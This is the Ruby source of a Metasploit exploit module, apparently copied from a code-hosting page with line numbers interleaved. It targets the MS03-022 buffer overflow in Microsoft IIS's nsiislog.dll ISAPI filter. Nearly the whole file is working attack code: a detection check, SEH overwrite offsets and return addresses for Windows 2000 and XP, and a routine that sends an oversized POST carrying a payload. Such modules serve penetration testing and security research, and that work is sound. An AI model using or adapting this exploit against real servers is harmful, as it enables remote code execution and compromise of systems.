Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::Remote::BruteTargets
11
  include Msf::Exploit::Remote::Seh
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
16
      'Description'    => %q{
17
          This exploits a buffer overflow found in the nsiislog.dll
18
        ISAPI filter that comes with Windows Media Server. This
19
        module will also work against the 'patched' MS03-019
20
        version. This vulnerability was addressed by MS03-022.
21
      },
22
      'Author'         => [ 'hdm' ],
23
      'License'        => MSF_LICENSE,
24
      'References'     =>
25
        [
26
          [ 'CVE', '2003-0349'],
27
          [ 'OSVDB', '4535'],
28
          [ 'BID', '8035'],
29
          [ 'MSB', 'MS03-022'],
30
          [ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
31
        ],
32
      'Privileged'     => false,
33
      'Payload'        =>
34
        {
35
          'Space'    => 1024,
36
          'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
37
          'StackAdjustment' => -3500,
38

39
        },
40
      'Platform'       => 'win',
41
      'Targets'        =>
42
        [
43
          # SEH offsets by version (Windows 2000)
44
          # 4.1.0.3917 =  9992
45
          # 4.1.0.3920 =  9992
46
          # 4.1.0.3927 =  9992
47
          # 4.1.0.3931 = 14092
48

49
          ['Brute Force',            { }],
50
          ['Windows 2000 -MS03-019', { 'Rets' => [  9988, 0x40f01333 ] }],
51
          ['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],
52
          ['Windows XP   -MS03-019', { 'Rets' => [  9992, 0x40f011e0 ] }],
53
        ],
54
      'DisclosureDate' => '2003-06-25',
55
      'DefaultTarget'  => 0))
56

57
    register_options(
58
      [
59
        OptString.new('URL', [ true,  "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
60
      ])
61
  end
62

63
  def check
64
    res = send_request_raw({
65
      'uri' => normalize_uri(datastore['URL'])
66
    }, -1)
67

68
    if (res and res.body =~ /NetShow ISAPI/)
69
      return Exploit::CheckCode::Detected
70
    end
71
    return Exploit::CheckCode::Safe
72
  end
73

74
  def exploit_target(target)
75

76
    # Create a buffer greater than max SEH offset (16384)
77
    pst = rand_text_alphanumeric(256) * 64
78

79
    # Create SEH frame and insert into buffer
80
    seh = generate_seh_payload(target['Rets'][1])
81
    pst[target['Rets'][0], seh.length] = seh
82

83
    # Send it to the server
84
    print_status("Sending request...")
85
    res = send_request_cgi({
86
      'uri'          => normalize_uri(datastore['URL']),
87
      'method'       => 'POST',
88
      'user-agent'   => 'NSPlayer/2.0',
89
      'content-type' => 'application/x-www-form-urlencoded',
90
      'data'         => pst
91
    }, 5)
92

93
    select(nil,nil,nil,1)
94

95
    handler
96
    disconnect
97
  end
98
end
99

100